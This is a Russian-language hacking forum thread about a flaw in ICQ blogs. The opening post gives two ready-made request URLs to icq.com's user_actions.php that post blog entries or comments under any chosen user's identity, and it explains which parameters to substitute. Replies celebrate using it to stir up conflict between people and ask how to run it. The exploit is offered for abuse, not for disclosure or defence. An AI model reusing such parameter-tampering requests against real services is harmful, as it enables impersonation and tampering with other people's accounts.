• XSS.stack #1 – первый литературный журнал от юзеров форума

Уязвимости: ICQ blogs

Отслеживать

Ŧ1LAN

CPU register
Пользователь
Регистрация
19.12.2005
Сообщения
1 057
Решения
1
Реакции
6
logo.gif

программа: ICQ blogs
описание:
Forall и AUR отыскали маленькую дырочку, с помощью которой можно было писать в любом блоге что угодно.От кого угодно.
Для постинга от лица хозяна номера:
Код: 
http://www.icq.com/people/user_actions.php?action_type=1
&message_type=2&uin_from=11111&uin_to=11111&
message_title=hackedby&message_body=forall
(меняем 11111 на что-то своё)
И для созданий комментов от кого угодно:
Код: 
http://www.icq.com/people/user_actions.php?action_type=
2&message_type=2&return_dest=%2Fpeople%2Fabout_me.php
%3Fuin%3D10000%26enf_wr%3D1&uin_from=336543024&uin_to=10000
&message_title=Message+from+User&message_body=xss.pro/
Заменяя 1000 (блог, в котором нужно что-то написать) и 336543024 (от кого пишем)

P.S.
Кто хочет, читайте надписи в аськах:
http://icq.com/people/about_me.php?uin=***
подставляя заместо "*" любой красивый номерок.
Источник: zloy.org
 
Я так понимаю можно отправлять любые мессаги кому угодно и от кого угодно,так это же грандиозно,можно пол интернета перессорить. :D
----------
Как отправлять соообщения что то у меня ничего не получаеться, вот скрин
[mod][Ŧ1LAN :] ВНИМАТЕЛЬНО Прочитайте первый пост![/mod]
 
«Aна®xист»
сам долбо**,если есть люди которые и не знают и чё ,тока и умеешь грить что все долбаёбы ,лучше бы сказал как юзать
Скриншот как юзать чтоли? :lol2:
или ты про багу если про багу то всё в первом посте написано подробно. ))))
 
admin


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх